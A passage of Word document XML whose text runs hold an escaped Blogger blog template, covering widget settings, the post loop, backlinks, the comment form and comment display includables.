        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='showLabels'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='showLocation'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='showTimestamp'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='postsPerAd'&gt;1&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='showBacklinks'&gt;false&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='style.bordercolor'&gt;#000000&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='showInlineAds'&gt;false&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='showReactions'&gt;false&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='main' var='top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:if cond='!data:mobile'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;!-- posts --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='blog-posts hfeed'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:include data='top' name='status-message'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='melesa-infi'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:loop values='data:posts' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;b:include data='post' name='post'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;!--COMMENTS--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;b:include cond='data:blog.pageType in {&amp;quot;static_page&amp;quot;,&amp;quot;item&amp;quot;}' data='post' name='comment_picker'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;!--/COMMENTS--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;!-- navigation --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:include name='nextprev'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;!-- feed links --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:include name='feedLinks'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:include name='mobile-main'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:include cond='data:top.showPlusOne' name='googlePlusBootstrap'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='backlinkDeleteIcon' var='backlink'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;span expr:class='&amp;quot;item-control &amp;quot; + data:backlink.adminClass'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;a expr:href='data:backlink.deleteUrl' expr:title='data:top.deleteBacklinkMsg'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;img src='https://resources.blogblog.com/img/icon_delete13.gif'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='backlinks' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;a name='links'/&gt;&lt;h4&gt;&lt;data:post.backlinksLabel/&gt;&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:if cond='data:post.numBacklinks != 0'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;dl class='comments-block' id='comments-block'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:loop values='data:post.backlinks' var='backlink'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div class='collapsed-backlink backlink-control'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;dt class='comment-title'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                    &lt;span class='backlink-toggle-zippy'&gt;&amp;#160;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;a expr:href='data:backlink.url' rel='nofollow'&gt;&lt;data:backlink.title/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;b:include data='backlink' name='backlinkDeleteIcon'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/dt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;dd class='comment-body collapseable'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;data:backlink.snippet/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/dd&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;dd class='comment-footer collapseable'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;span class='comment-author'&gt;&lt;data:post.authorLabel/&gt; &lt;data:backlink.author/&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;span class='comment-timestamp'&gt;&lt;data:post.timestampLabel/&gt; &lt;data:backlink.timestamp/&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/dd&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/dl&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;p class='comment-footer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;a class='comment-link' expr:href='data:post.createLinkUrl' expr:id='data:widget.instanceId + &amp;quot;_backlinks-create-link&amp;quot;' target='_blank'&gt;&lt;data:post.createLinkLabel/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='comment-form' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='comment-form'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;a name='comment-form'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:mobile'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;h4 id='comment-post-message'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                &lt;a expr:id='data:widget.instanceId + &amp;quot;_comment-editor-toggle-link&amp;quot;' href='javascript:void(0)'&gt;&lt;data:postCommentMsg/&gt;&lt;/a&gt;&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;p&gt;&lt;data:blogCommentMessage/&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;data:blogTeamBlogMessage/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' style='display: none' width='100%'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;h4 id='comment-post-message'&gt;&lt;data:postCommentMsg/&gt;&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;p&gt;&lt;data:blogCommentMessage/&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;data:blogTeamBlogMessage/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;data:post.cmtfpIframe/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;script type='text/javascript'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              BLOG_CMT_createIframe(&amp;#39;&lt;data:post.appRpcRelayPath/&gt;&amp;#39;);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='commentDeleteIcon' var='comment'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;span expr:class='&amp;quot;item-control &amp;quot; + data:comment.adminClass'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:showCmtPopup'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='goog-toggle-button'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div class='goog-inline-block comment-action-icon'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;a class='comment-delete' expr:href='data:comment.deleteUrl' expr:title='data:top.deleteCommentMsg'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;img src='https://resources.blogblog.com/img/icon_delete13.gif'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='comment_count_picker' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:if cond='data:post.commentSource == 1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;span class='cmt_count_iframe_holder' expr:data-count='data:post.numComments' expr:data-onclick='data:post.addCommentOnclick' expr:data-post-url='data:post.url' expr:data-url='data:post.url.canonical.http'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;a class='comment-link' expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;data:post.commentLabelFull/&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='comment_picker' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:if cond='data:post.commentSource == 1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:include data='post' name='iframe_comments'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:elseif cond='data:post.showThreadedComments'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:include data='post' name='threaded_comments'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:include data='post' name='comments'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='comments' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='comments' id='comments'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;a name='comments'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:post.allowComments'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;h4&gt;&lt;data:post.commentLabelFull/&gt;:&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:if cond='data:post.commentPagingRequired'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
